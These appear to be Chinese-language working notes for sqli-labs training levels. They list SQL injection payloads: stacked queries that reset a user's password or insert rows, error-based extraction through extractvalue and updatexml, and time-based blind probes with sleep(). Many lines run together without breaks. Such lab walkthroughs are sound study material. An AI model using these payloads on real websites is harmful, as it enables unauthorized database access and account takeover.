?id=1 and 1=1--+
?id=1 and 1=2--+
?id=1;update users set password='123456' where username='Dumb'--+
#修改成功
?id=1
?id=1' #无回显
?id=1" #回显
?id=1' --+ #无回显
?id=1" --+ #回显
?id=1') --+ #回显
?id=1')and 1=1--+ #回显
?id=1')and 1=2--+ #无回显
#用')闭合成功
payload
?id=1');update users set password='test' where username='Dumb'--+无报错,且是个数字型
payload
?id=1;update users set password='test' where username='Dumb'--+payload
login_user=admin&login_password=admin';update users set password='123456' where username='Dumb'#&mysubmit=Login用修改后的密码登录,登录成功
login_user=Dumb&login_password=123456#&mysubmit=Login
和四十二关思路一样,闭合使用')
login_user=admin&login_password=admin');update users set password='test' where username='Dumb'#&mysubmit=Login用修改后的密码登录,登录成功
login_user=Dumb&login_password=test#&mysubmit=Login
payload
login_user=admin&login_password=admin';update users set password='123456' where username='Dumb'#&mysubmit=Login用修改后的密码登录,登录成功
login_user=Dumb&login_password=123456#&mysubmit=Login
payload
login_user=admin&login_password=admin');update users set password='test' where username='Dumb'#&mysubmit=Login?sort=1
?sort=1 desc--+
发现可以注入,上payload
?sort=(extractvalue(0,concat(0x7e,database())))--+
?sort=1'"--+
#报错"-- ' 用'闭合
payload
?sort=1'and extractvalue(0,concat(0x7e,database()))--+同四十六关,不能用报错
?sort=1%20and%20if(length(database())=8,sleep(2),1)--+同四十七关,不能用报错
?sort=1'%20and%20if(length(database())=8,sleep(2),1)--+?sort=1'"--+
#报错 ''"--' 应该是数字型
payload
?sort=1 and updatexml(1,concat(0x7e,database()),0)--+看源码使用了mysqli_multi_query函数,说明可以用堆叠注入
?sort=1;insert users values(123,'abc',123)--+添加数据成功
?sort=1'"--+
#报错"-- ' 用'来闭合
payload
?sort=1' and updatexml(1,concat(0x7e,database()),0)--+
尝试堆叠注入
?sort=1';insert users values(124,'abc',124)--+
?sort=1 #堆叠注入成功同四十八关,不能报错,但这里可以用堆叠注入
payload:
?sort=1%20and%20if(length(database())=8,sleep(2),1)--+
?sort=1;insert users values(125,'abc',125)--+?sort=1' #无回显
?sort=1'--+ #有回显
payload
?sort=1';insert users values(15,'abc',15)--+